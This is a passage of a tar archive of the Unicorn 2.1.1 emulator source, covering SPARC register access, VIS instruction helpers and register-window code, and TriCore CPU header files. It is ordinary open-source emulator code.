������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/unicorn64.c���������������������������������������������������������0000664�0000000�0000000�00000011411�14675241067�0020542�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" const int SPARC64_REGS_STORAGE_SIZE = offsetof(CPUSPARCState, irq_manager); static bool sparc_stop_interrupt(struct uc_struct *uc, int intno) { switch(intno) { default: return false; case TT_ILL_INSN: return true; } } static void sparc_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUSPARCState *)uc->cpu->env_ptr)->pc = address; ((CPUSPARCState *)uc->cpu->env_ptr)->npc = address + 4; } static uint64_t sparc_get_pc(struct uc_struct *uc) { return ((CPUSPARCState *)uc->cpu->env_ptr)->pc; } static void sparc_release(void *ctx) { release_common(ctx); #if 0 int i; TCGContext *tcg_ctx = (TCGContext *) ctx; SPARCCPU *cpu = SPARC_CPU(tcg_ctx->uc->cpu); CPUSPARCState *env = &cpu->env; g_free(tcg_ctx->cpu_wim); g_free(tcg_ctx->cpu_cond); g_free(tcg_ctx->cpu_cc_src); g_free(tcg_ctx->cpu_cc_src2); g_free(tcg_ctx->cpu_cc_dst); g_free(tcg_ctx->cpu_fsr); g_free(tcg_ctx->sparc_cpu_pc); g_free(tcg_ctx->cpu_npc); g_free(tcg_ctx->cpu_y); g_free(tcg_ctx->cpu_tbr); for (i = 0; i < 8; i++) { g_free(tcg_ctx->cpu_gregs[i]); } for (i = 0; i < 32; i++) { g_free(tcg_ctx->cpu_gpr[i]); } g_free(tcg_ctx->cpu_PC); g_free(tcg_ctx->btarget); g_free(tcg_ctx->bcond); g_free(tcg_ctx->cpu_dspctrl); g_free(tcg_ctx->tb_ctx.tbs); g_free(env->def); #endif } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->gregs, 0, sizeof(env->gregs)); memset(env->fpr, 0, sizeof(env->fpr)); memset(env->regbase, 0, sizeof(env->regbase)); env->pc = 0; env->npc = 0; env->regwptr = env->regbase; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUSPARCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->gregs[regid - UC_SPARC_REG_G0]; } else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regwptr[regid - UC_SPARC_REG_O0]; } else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regwptr[8 + regid - UC_SPARC_REG_L0]; } else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regwptr[16 + regid - UC_SPARC_REG_I0]; } else { switch(regid) { default: break; case UC_SPARC_REG_PC: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->pc; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUSPARCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) { CHECK_REG_TYPE(uint64_t); env->gregs[regid - UC_SPARC_REG_G0] = *(uint64_t *)value; } else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) { CHECK_REG_TYPE(uint64_t); env->regwptr[regid - UC_SPARC_REG_O0] = *(uint64_t *)value; } else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) { CHECK_REG_TYPE(uint64_t); env->regwptr[8 + regid - UC_SPARC_REG_L0] = *(uint64_t *)value; } else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) { CHECK_REG_TYPE(uint64_t); env->regwptr[16 + regid - UC_SPARC_REG_I0] = *(uint64_t *)value; } else { switch(regid) { default: break; case UC_SPARC_REG_PC: CHECK_REG_TYPE(uint64_t); env->pc = *(uint64_t *)value; env->npc = *(uint64_t *)value + 4; *setpc = 1; break; } } return ret; } static int sparc_cpus_init(struct uc_struct *uc, const char *cpu_model) { SPARCCPU *cpu; cpu = cpu_sparc_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->release = sparc_release; uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = sparc_set_pc; uc->get_pc = sparc_get_pc; uc->stop_interrupt = sparc_stop_interrupt; uc->cpus_init = sparc_cpus_init; uc_common_init(uc); } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/vis_helper.c��������������������������������������������������������0000664�0000000�0000000�00000035476�14675241067�0021074�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * VIS op helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" /* This function uses non-native bit order */ #define GET_FIELD(X, FROM, TO) \ ((X) >> (63 - (TO)) & ((1ULL << ((TO) - (FROM) + 1)) - 1)) /* This function uses the order in the manuals, i.e. bit 0 is 2^0 */ #define GET_FIELD_SP(X, FROM, TO) \ GET_FIELD(X, 63 - (TO), 63 - (FROM)) target_ulong helper_array8(target_ulong pixel_addr, target_ulong cubesize) { return (GET_FIELD_SP(pixel_addr, 60, 63) << (17 + 2 * cubesize)) | (GET_FIELD_SP(pixel_addr, 39, 39 + cubesize - 1) << (17 + cubesize)) | (GET_FIELD_SP(pixel_addr, 17 + cubesize - 1, 17) << 17) | (GET_FIELD_SP(pixel_addr, 56, 59) << 13) | (GET_FIELD_SP(pixel_addr, 35, 38) << 9) | (GET_FIELD_SP(pixel_addr, 13, 16) << 5) | (((pixel_addr >> 55) & 1) << 4) | (GET_FIELD_SP(pixel_addr, 33, 34) << 2) | GET_FIELD_SP(pixel_addr, 11, 12); } #ifdef HOST_WORDS_BIGENDIAN #define VIS_B64(n) b[7 - (n)] #define VIS_W64(n) w[3 - (n)] #define VIS_SW64(n) sw[3 - (n)] #define VIS_L64(n) l[1 - (n)] #define VIS_B32(n) b[3 - (n)] #define VIS_W32(n) w[1 - (n)] #else #define VIS_B64(n) b[n] #define VIS_W64(n) w[n] #define VIS_SW64(n) sw[n] #define VIS_L64(n) l[n] #define VIS_B32(n) b[n] #define VIS_W32(n) w[n] #endif typedef union { uint8_t b[8]; uint16_t w[4]; int16_t sw[4]; uint32_t l[2]; uint64_t ll; float64 d; } VIS64; typedef union { uint8_t b[4]; uint16_t w[2]; uint32_t l; float32 f; } VIS32; uint64_t helper_fpmerge(uint64_t src1, uint64_t src2) { VIS64 s, d; s.ll = src1; d.ll = src2; /* Reverse calculation order to handle overlap */ d.VIS_B64(7) = s.VIS_B64(3); d.VIS_B64(6) = d.VIS_B64(3); d.VIS_B64(5) = s.VIS_B64(2); d.VIS_B64(4) = d.VIS_B64(2); d.VIS_B64(3) = s.VIS_B64(1); d.VIS_B64(2) = d.VIS_B64(1); d.VIS_B64(1) = s.VIS_B64(0); /* d.VIS_B64(0) = d.VIS_B64(0); */ return d.ll; } uint64_t helper_fmul8x16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * (int32_t)s.VIS_B64(r); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmul8x16al(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(1) * (int32_t)s.VIS_B64(r); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmul8x16au(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(0) * (int32_t)s.VIS_B64(r); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmul8sux16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * ((int32_t)s.VIS_SW64(r) >> 8); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmul8ulx16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * ((uint32_t)s.VIS_B64(r * 2)); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmuld8sux16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * ((int32_t)s.VIS_SW64(r) >> 8); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_L64(r) = tmp; /* Reverse calculation order to handle overlap */ PMUL(1); PMUL(0); #undef PMUL return d.ll; } uint64_t helper_fmuld8ulx16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * ((uint32_t)s.VIS_B64(r * 2)); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_L64(r) = tmp; /* Reverse calculation order to handle overlap */ PMUL(1); PMUL(0); #undef PMUL return d.ll; } uint64_t helper_fexpand(uint64_t src1, uint64_t src2) { VIS32 s; VIS64 d; s.l = (uint32_t)src1; d.ll = src2; d.VIS_W64(0) = s.VIS_B32(0) << 4; d.VIS_W64(1) = s.VIS_B32(1) << 4; d.VIS_W64(2) = s.VIS_B32(2) << 4; d.VIS_W64(3) = s.VIS_B32(3) << 4; return d.ll; } #define VIS_HELPER(name, F) \ uint64_t name##16(uint64_t src1, uint64_t src2) \ { \ VIS64 s, d; \ \ s.ll = src1; \ d.ll = src2; \ \ d.VIS_W64(0) = F(d.VIS_W64(0), s.VIS_W64(0)); \ d.VIS_W64(1) = F(d.VIS_W64(1), s.VIS_W64(1)); \ d.VIS_W64(2) = F(d.VIS_W64(2), s.VIS_W64(2)); \ d.VIS_W64(3) = F(d.VIS_W64(3), s.VIS_W64(3)); \ \ return d.ll; \ } \ \ uint32_t name##16s(uint32_t src1, uint32_t src2) \ { \ VIS32 s, d; \ \ s.l = src1; \ d.l = src2; \ \ d.VIS_W32(0) = F(d.VIS_W32(0), s.VIS_W32(0)); \ d.VIS_W32(1) = F(d.VIS_W32(1), s.VIS_W32(1)); \ \ return d.l; \ } \ \ uint64_t name##32(uint64_t src1, uint64_t src2) \ { \ VIS64 s, d; \ \ s.ll = src1; \ d.ll = src2; \ \ d.VIS_L64(0) = F(d.VIS_L64(0), s.VIS_L64(0)); \ d.VIS_L64(1) = F(d.VIS_L64(1), s.VIS_L64(1)); \ \ return d.ll; \ } \ \ uint32_t name##32s(uint32_t src1, uint32_t src2) \ { \ VIS32 s, d; \ \ s.l = src1; \ d.l = src2; \ \ d.l = F(d.l, s.l); \ \ return d.l; \ } #define FADD(a, b) ((a) + (b)) #define FSUB(a, b) ((a) - (b)) VIS_HELPER(helper_fpadd, FADD) VIS_HELPER(helper_fpsub, FSUB) #define VIS_CMPHELPER(name, F) \ uint64_t name##16(uint64_t src1, uint64_t src2) \ { \ VIS64 s, d; \ \ s.ll = src1; \ d.ll = src2; \ \ d.VIS_W64(0) = F(s.VIS_W64(0), d.VIS_W64(0)) ? 1 : 0; \ d.VIS_W64(0) |= F(s.VIS_W64(1), d.VIS_W64(1)) ? 2 : 0; \ d.VIS_W64(0) |= F(s.VIS_W64(2), d.VIS_W64(2)) ? 4 : 0; \ d.VIS_W64(0) |= F(s.VIS_W64(3), d.VIS_W64(3)) ? 8 : 0; \ d.VIS_W64(1) = d.VIS_W64(2) = d.VIS_W64(3) = 0; \ \ return d.ll; \ } \ \ uint64_t name##32(uint64_t src1, uint64_t src2) \ { \ VIS64 s, d; \ \ s.ll = src1; \ d.ll = src2; \ \ d.VIS_L64(0) = F(s.VIS_L64(0), d.VIS_L64(0)) ? 1 : 0; \ d.VIS_L64(0) |= F(s.VIS_L64(1), d.VIS_L64(1)) ? 2 : 0; \ d.VIS_L64(1) = 0; \ \ return d.ll; \ } #define FCMPGT(a, b) ((a) > (b)) #define FCMPEQ(a, b) ((a) == (b)) #define FCMPLE(a, b) ((a) <= (b)) #define FCMPNE(a, b) ((a) != (b)) VIS_CMPHELPER(helper_fcmpgt, FCMPGT) VIS_CMPHELPER(helper_fcmpeq, FCMPEQ) VIS_CMPHELPER(helper_fcmple, FCMPLE) VIS_CMPHELPER(helper_fcmpne, FCMPNE) uint64_t helper_pdist(uint64_t sum, uint64_t src1, uint64_t src2) { int i; for (i = 0; i < 8; i++) { int s1, s2; s1 = (src1 >> (56 - (i * 8))) & 0xff; s2 = (src2 >> (56 - (i * 8))) & 0xff; /* Absolute value of difference. */ s1 -= s2; if (s1 < 0) { s1 = -s1; } sum += s1; } return sum; } uint32_t helper_fpack16(uint64_t gsr, uint64_t rs2) { int scale = (gsr >> 3) & 0xf; uint32_t ret = 0; int byte; for (byte = 0; byte < 4; byte++) { uint32_t val; int16_t src = rs2 >> (byte * 16); int32_t scaled = src << scale; int32_t from_fixed = scaled >> 7; val = (from_fixed < 0 ? 0 : from_fixed > 255 ? 255 : from_fixed); ret |= val << (8 * byte); } return ret; } uint64_t helper_fpack32(uint64_t gsr, uint64_t rs1, uint64_t rs2) { int scale = (gsr >> 3) & 0x1f; uint64_t ret = 0; int word; ret = (rs1 << 8) & ~(0x000000ff000000ffULL); for (word = 0; word < 2; word++) { uint64_t val; int32_t src = rs2 >> (word * 32); int64_t scaled = (int64_t)src << scale; int64_t from_fixed = scaled >> 23; val = (from_fixed < 0 ? 0 : (from_fixed > 255) ? 255 : from_fixed); ret |= val << (32 * word); } return ret; } uint32_t helper_fpackfix(uint64_t gsr, uint64_t rs2) { int scale = (gsr >> 3) & 0x1f; uint32_t ret = 0; int word; for (word = 0; word < 2; word++) { uint32_t val; int32_t src = rs2 >> (word * 32); int64_t scaled = (int64_t)src << scale; int64_t from_fixed = scaled >> 16; val = (from_fixed < -32768 ? -32768 : from_fixed > 32767 ? 32767 : from_fixed); ret |= (val & 0xffff) << (word * 16); } return ret; } uint64_t helper_bshuffle(uint64_t gsr, uint64_t src1, uint64_t src2) { union { uint64_t ll[2]; uint8_t b[16]; } s; VIS64 r; uint32_t i, mask, host; /* Set up S such that we can index across all of the bytes. */ #ifdef HOST_WORDS_BIGENDIAN s.ll[0] = src1; s.ll[1] = src2; host = 0; #else s.ll[1] = src1; s.ll[0] = src2; host = 15; #endif mask = gsr >> 32; for (i = 0; i < 8; ++i) { unsigned e = (mask >> (28 - i*4)) & 0xf; r.VIS_B64(i) = s.b[e ^ host]; } return r.ll; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/win_helper.c��������������������������������������������������������0000664�0000000�0000000�00000024435�14675241067�0021061�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Helpers for CWP and PSTATE handling * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" static inline void memcpy32(target_ulong *dst, const target_ulong *src) { dst[0] = src[0]; dst[1] = src[1]; dst[2] = src[2]; dst[3] = src[3]; dst[4] = src[4]; dst[5] = src[5]; dst[6] = src[6]; dst[7] = src[7]; } void cpu_set_cwp(CPUSPARCState *env, int new_cwp) { /* put the modified wrap registers at their proper location */ if (env->cwp == env->nwindows - 1) { memcpy32(env->regbase, env->regbase + env->nwindows * 16); } env->cwp = new_cwp; /* put the wrap registers at their temporary location */ if (new_cwp == env->nwindows - 1) { memcpy32(env->regbase + env->nwindows * 16, env->regbase); } env->regwptr = env->regbase + (new_cwp * 16); } target_ulong cpu_get_psr(CPUSPARCState *env) { helper_compute_psr(env); #if !defined(TARGET_SPARC64) return env->version | (env->psr & PSR_ICC) | (env->psref ? PSR_EF : 0) | (env->psrpil << 8) | (env->psrs ? PSR_S : 0) | (env->psrps ? PSR_PS : 0) | (env->psret ? PSR_ET : 0) | env->cwp; #else return env->psr & PSR_ICC; #endif } void cpu_put_psr_raw(CPUSPARCState *env, target_ulong val) { env->psr = val & PSR_ICC; #if !defined(TARGET_SPARC64) env->psref = (val & PSR_EF) ? 1 : 0; env->psrpil = (val & PSR_PIL) >> 8; env->psrs = (val & PSR_S) ? 1 : 0; env->psrps = (val & PSR_PS) ? 1 : 0; env->psret = (val & PSR_ET) ? 1 : 0; #endif env->cc_op = CC_OP_FLAGS; #if !defined(TARGET_SPARC64) cpu_set_cwp(env, val & PSR_CWP); #endif } /* Called with BQL held */ void cpu_put_psr(CPUSPARCState *env, target_ulong val) { cpu_put_psr_raw(env, val); #if !defined(TARGET_SPARC64) // cpu_check_irqs(env); #endif } int cpu_cwp_inc(CPUSPARCState *env, int cwp) { if (unlikely(cwp >= env->nwindows)) { cwp -= env->nwindows; } return cwp; } int cpu_cwp_dec(CPUSPARCState *env, int cwp) { if (unlikely(cwp < 0)) { cwp += env->nwindows; } return cwp; } #ifndef TARGET_SPARC64 void helper_rett(CPUSPARCState *env) { unsigned int cwp; if (env->psret == 1) { cpu_raise_exception_ra(env, TT_ILL_INSN, GETPC()); } env->psret = 1; cwp = cpu_cwp_inc(env, env->cwp + 1) ; if (env->wim & (1 << cwp)) { cpu_raise_exception_ra(env, TT_WIN_UNF, GETPC()); } cpu_set_cwp(env, cwp); env->psrs = env->psrps; } /* XXX: use another pointer for %iN registers to avoid slow wrapping handling ? */ void helper_save(CPUSPARCState *env) { uint32_t cwp; cwp = cpu_cwp_dec(env, env->cwp - 1); if (env->wim & (1 << cwp)) { cpu_raise_exception_ra(env, TT_WIN_OVF, GETPC()); } cpu_set_cwp(env, cwp); } void helper_restore(CPUSPARCState *env) { uint32_t cwp; cwp = cpu_cwp_inc(env, env->cwp + 1); if (env->wim & (1 << cwp)) { cpu_raise_exception_ra(env, TT_WIN_UNF, GETPC()); } cpu_set_cwp(env, cwp); } void helper_wrpsr(CPUSPARCState *env, target_ulong new_psr) { if ((new_psr & PSR_CWP) >= env->nwindows) { cpu_raise_exception_ra(env, TT_ILL_INSN, GETPC()); } else { /* cpu_put_psr may trigger interrupts, hence BQL */ cpu_put_psr(env, new_psr); } } target_ulong helper_rdpsr(CPUSPARCState *env) { return cpu_get_psr(env); } #else /* XXX: use another pointer for %iN registers to avoid slow wrapping handling ? */ void helper_save(CPUSPARCState *env) { uint32_t cwp; cwp = cpu_cwp_dec(env, env->cwp - 1); if (env->cansave == 0) { int tt = TT_SPILL | (env->otherwin != 0 ? (TT_WOTHER | ((env->wstate & 0x38) >> 1)) : ((env->wstate & 0x7) << 2)); cpu_raise_exception_ra(env, tt, GETPC()); } else { if (env->cleanwin - env->canrestore == 0) { /* XXX Clean windows without trap */ cpu_raise_exception_ra(env, TT_CLRWIN, GETPC()); } else { env->cansave--; env->canrestore++; cpu_set_cwp(env, cwp); } } } void helper_restore(CPUSPARCState *env) { uint32_t cwp; cwp = cpu_cwp_inc(env, env->cwp + 1); if (env->canrestore == 0) { int tt = TT_FILL | (env->otherwin != 0 ? (TT_WOTHER | ((env->wstate & 0x38) >> 1)) : ((env->wstate & 0x7) << 2)); cpu_raise_exception_ra(env, tt, GETPC()); } else { env->cansave++; env->canrestore--; cpu_set_cwp(env, cwp); } } void helper_flushw(CPUSPARCState *env) { if (env->cansave != env->nwindows - 2) { int tt = TT_SPILL | (env->otherwin != 0 ? (TT_WOTHER | ((env->wstate & 0x38) >> 1)) : ((env->wstate & 0x7) << 2)); cpu_raise_exception_ra(env, tt, GETPC()); } } void helper_saved(CPUSPARCState *env) { env->cansave++; if (env->otherwin == 0) { env->canrestore--; } else { env->otherwin--; } } void helper_restored(CPUSPARCState *env) { env->canrestore++; if (env->cleanwin < env->nwindows - 1) { env->cleanwin++; } if (env->otherwin == 0) { env->cansave--; } else { env->otherwin--; } } target_ulong cpu_get_ccr(CPUSPARCState *env) { target_ulong psr; psr = cpu_get_psr(env); return ((env->xcc >> 20) << 4) | ((psr & PSR_ICC) >> 20); } void cpu_put_ccr(CPUSPARCState *env, target_ulong val) { env->xcc = (val >> 4) << 20; env->psr = (val & 0xf) << 20; CC_OP = CC_OP_FLAGS; } target_ulong cpu_get_cwp64(CPUSPARCState *env) { return env->nwindows - 1 - env->cwp; } void cpu_put_cwp64(CPUSPARCState *env, int cwp) { if (unlikely(cwp >= env->nwindows || cwp < 0)) { cwp %= env->nwindows; } cpu_set_cwp(env, env->nwindows - 1 - cwp); } target_ulong helper_rdccr(CPUSPARCState *env) { return cpu_get_ccr(env); } void helper_wrccr(CPUSPARCState *env, target_ulong new_ccr) { cpu_put_ccr(env, new_ccr); } /* CWP handling is reversed in V9, but we still use the V8 register order. */ target_ulong helper_rdcwp(CPUSPARCState *env) { return cpu_get_cwp64(env); } void helper_wrcwp(CPUSPARCState *env, target_ulong new_cwp) { cpu_put_cwp64(env, new_cwp); } static inline uint64_t *get_gregset(CPUSPARCState *env, uint32_t pstate) { if (env->def.features & CPU_FEATURE_GL) { return env->glregs + (env->gl & 7) * 8; } switch (pstate) { default: /* pass through to normal set of global registers */ case 0: return env->bgregs; case PS_AG: return env->agregs; case PS_MG: return env->mgregs; case PS_IG: return env->igregs; } } static inline uint64_t *get_gl_gregset(CPUSPARCState *env, uint32_t gl) { return env->glregs + (gl & 7) * 8; } /* Switch global register bank */ void cpu_gl_switch_gregs(CPUSPARCState *env, uint32_t new_gl) { uint64_t *src, *dst; src = get_gl_gregset(env, new_gl); dst = get_gl_gregset(env, env->gl); if (src != dst) { memcpy32(dst, env->gregs); memcpy32(env->gregs, src); } } void helper_wrgl(CPUSPARCState *env, target_ulong new_gl) { cpu_gl_switch_gregs(env, new_gl & 7); env->gl = new_gl & 7; } void cpu_change_pstate(CPUSPARCState *env, uint32_t new_pstate) { uint32_t pstate_regs, new_pstate_regs; uint64_t *src, *dst; if (env->def.features & CPU_FEATURE_GL) { /* PS_AG, IG and MG are not implemented in this case */ new_pstate &= ~(PS_AG | PS_IG | PS_MG); env->pstate = new_pstate; return; } pstate_regs = env->pstate & 0xc01; new_pstate_regs = new_pstate & 0xc01; if (new_pstate_regs != pstate_regs) { /* Switch global register bank */ src = get_gregset(env, new_pstate_regs); dst = get_gregset(env, pstate_regs); memcpy32(dst, env->gregs); memcpy32(env->gregs, src); } env->pstate = new_pstate; } void helper_wrpstate(CPUSPARCState *env, target_ulong new_state) { cpu_change_pstate(env, new_state & 0xf3f); if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } } void helper_wrpil(CPUSPARCState *env, target_ulong new_pil) { env->psrpil = new_pil; if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } } void helper_done(CPUSPARCState *env) { trap_state *tsptr = cpu_tsptr(env); env->pc = tsptr->tnpc; env->npc = tsptr->tnpc + 4; cpu_put_ccr(env, tsptr->tstate >> 32); env->asi = (tsptr->tstate >> 24) & 0xff; cpu_change_pstate(env, (tsptr->tstate >> 8) & 0xf3f); cpu_put_cwp64(env, tsptr->tstate & 0xff); if (cpu_has_hypervisor(env)) { uint32_t new_gl = (tsptr->tstate >> 40) & 7; env->hpstate = env->htstate[env->tl]; cpu_gl_switch_gregs(env, new_gl); env->gl = new_gl; } env->tl--; if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } } void helper_retry(CPUSPARCState *env) { trap_state *tsptr = cpu_tsptr(env); env->pc = tsptr->tpc; env->npc = tsptr->tnpc; cpu_put_ccr(env, tsptr->tstate >> 32); env->asi = (tsptr->tstate >> 24) & 0xff; cpu_change_pstate(env, (tsptr->tstate >> 8) & 0xf3f); cpu_put_cwp64(env, tsptr->tstate & 0xff); if (cpu_has_hypervisor(env)) { uint32_t new_gl = (tsptr->tstate >> 40) & 7; env->hpstate = env->htstate[env->tl]; cpu_gl_switch_gregs(env, new_gl); env->gl = new_gl; } env->tl--; if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } } #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017110�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/cpu-param.h�������������������������������������������������������0000664�0000000�0000000�00000000576�14675241067�0021156�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TriCore cpu parameters for qemu. * * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * SPDX-License-Identifier: LGPL-2.1+ */ #ifndef TRICORE_CPU_PARAM_H #define TRICORE_CPU_PARAM_H 1 #define TARGET_LONG_BITS 32 #define TARGET_PAGE_BITS 14 #define TARGET_PHYS_ADDR_SPACE_BITS 32 #define TARGET_VIRT_ADDR_SPACE_BITS 32 #define NB_MMU_MODES 3 #endif ����������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/cpu-qom.h���������������������������������������������������������0000664�0000000�0000000�00000002512�14675241067�0020642�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #ifndef QEMU_TRICORE_CPU_QOM_H #define QEMU_TRICORE_CPU_QOM_H #include "hw/core/cpu.h" #define TYPE_TRICORE_CPU "tricore-cpu" #define TRICORE_CPU(obj) ((TriCoreCPU *)obj) #define TRICORE_CPU_CLASS(klass) ((TriCoreCPUClass *)klass) #define TRICORE_CPU_GET_CLASS(obj) (&((TriCoreCPU *)obj)->cc) typedef struct TriCoreCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); } TriCoreCPUClass; #endif /* QEMU_TRICORE_CPU_QOM_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/cpu.c�������������������������������������������������������������0000664�0000000�0000000�00000011625�14675241067�0020050�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TriCore emulation for qemu: main translation routines. * * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under 